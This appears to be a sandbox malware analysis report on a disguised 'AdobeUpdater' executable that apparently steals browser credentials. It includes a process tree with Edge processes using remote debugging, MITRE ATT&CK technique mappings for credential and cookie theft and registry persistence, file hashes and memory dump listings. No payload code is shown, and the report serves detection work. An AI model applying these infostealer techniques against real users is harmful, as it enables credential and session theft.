        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4608,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:8
        5⤵
        
        PID:3136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5044,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5212,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=5196 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4624,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:8
        5⤵
        
        PID:4480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mute-audio --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5360,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=5356 /prefetch:8
        5⤵
        Modifies registry class
        
        PID:4460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5568,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
  C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:640

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5404

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe

Filesize
2.8MB

MD5
2ee4087423cdcc9ef14519db15f627b6

SHA1
104667f7a390ce8d36a384365d6cca93dbff402f

SHA256
28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc

SHA512
9f68b9e4136cb60eb42729b58097b9185a833b77bb5a253d5492ba259f50cd1ec4ebda1f37184aada58c9f39eb6e02b48964e41e6deb5dc57a2305bcdd6f76eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
d2b80809be9313a5e9cab7b388f348dc

SHA1
492d182a19ecabc9055173855f9c3d1d25c5a043

SHA256
f2fdf83fa1094ee16fc8f375860fb19bac1cdfdcdfcc6c747d7bc025734a6ef9

SHA512
3220dcce43ef1da47ac9dc5d86b5ec444d53bd30122260dd0c7670b2ccda290a9ac7c16a1c6cf4ccba9a72fbf799a84f5c19fbb0a84389348ab051f920d5c06c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
d8a60f400bb91f97ca5fa9865873b052

SHA1
8a4dddce7615d9c7b7ac66ecc02e519028d7089b

SHA256
7d4b8c241f77635f934a7d5a7cf8b71fe8ceb439362de84422136ec0c21dc4f3

SHA512
2a4baa7586a292d9fc58db4f0f6f9266de4a4de32ded44c067c66c7e33e657149b6563c99fe2efb1e5648e6762e9312d54d1ceebf15e743d4aa96d22c0f78270

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9F3D.tmp.bat

Filesize
265B

MD5
0b697085b9b30de301bfdef88841f891

SHA1
ebe7cb7db8aa1e5e7673212f525d15818f535b6c

SHA256
821ae8e8189cc8fd500a26dd8e1c9e6353cc8244b2d412c7f9467d4cc9d7e08d

SHA512
e9eb8ded5ce0711d45722726da0f614e69c87d50b5060fcab8767a14eacfcb01085402042a4458618a733e6d3a346b9eceb0332cf7e3f13f4530e315ac2c087e

Download Submit
memory/4508-6-0x0000015EFD9F0000-0x0000015EFDA0A000-memory.dmp

Filesize
104KB

Download
memory/4508-5-0x0000015EFDB20000-0x0000015EFDC18000-memory.dmp

Filesize
992KB

Download
memory/4508-12-0x00007FFB18E70000-0x00007FFB19932000-memory.dmp

Filesize
10.8MB

Download
memory/4508-8-0x0000015EFD9E0000-0x0000015EFD9EA000-memory.dmp

Filesize
40KB

Download
memory/4508-0-0x00007FFB18E73000-0x00007FFB18E75000-memory.dmp

Filesize
8KB

Download
memory/4508-1-0x0000015EE3060000-0x0000015EE3328000-memory.dmp

Filesize
2.8MB

Download
memory/4508-9-0x0000015EFDC20000-0x0000015EFDCC0000-memory.dmp

Filesize
640KB

Download
memory/4508-2-0x0000015EFD760000-0x0000015EFD7D6000-memory.dmp

Filesize
472KB

Download
memory/4508-3-0x00007FFB18E70000-0x00007FFB19932000-memory.dmp

Filesize
10.8MB

Download
memory/4508-4-0x0000015EE5010000-0x0000015EE502E000-memory.dmp

Filesize
120KB

Download
memory/4508-7-0x0000015EFD9D0000-0x0000015EFD9DA000-memory.dmp

Filesize
40KB

Download
memory/5012-15-0x0000023DAC100000-0x0000023DAC1B2000-memory.dmp

Filesize
712KB

Download
memory/5012-20-0x0000023DAACF0000-0x0000023DAACF8000-memory.dmp

Filesize
32KB

Download
memory/5012-19-0x0000023DAACD0000-0x0000023DAACE4000-memory.dmp

Filesize
80KB

Download
memory/5012-55-0x0000023DAC470000-0x0000023DAC478000-memory.dmp

Filesize
32KB

Download
memory/5012-54-0x0000023DAC420000-0x0000023DAC446000-memory.dmp

Filesize
152KB

Download
memory/5012-56-0x0000023DAC450000-0x0000023DAC466000-memory.dmp

Filesize
88KB

Download
memory/5012-57-0x0000023DAC480000-0x0000023DAC48A000-memory.dmp

Filesize
40KB

Download
memory/5012-17-0x0000023DAC1C0000-0x0000023DAC1D0000-memory.dmp

Filesize
64KB

Download
memory/5012-73-0x0000023DAC490000-0x0000023DAC4AE000-memory.dmp

Filesize
120KB

Download
memory/5012-75-0x0000023DAC4F0000-0x0000023DAC512000-memory.dmp

Filesize
136KB

Download
memory/5012-16-0x0000023DAAB60000-0x0000023DAAB74000-memory.dmp

Filesize
80KB

Download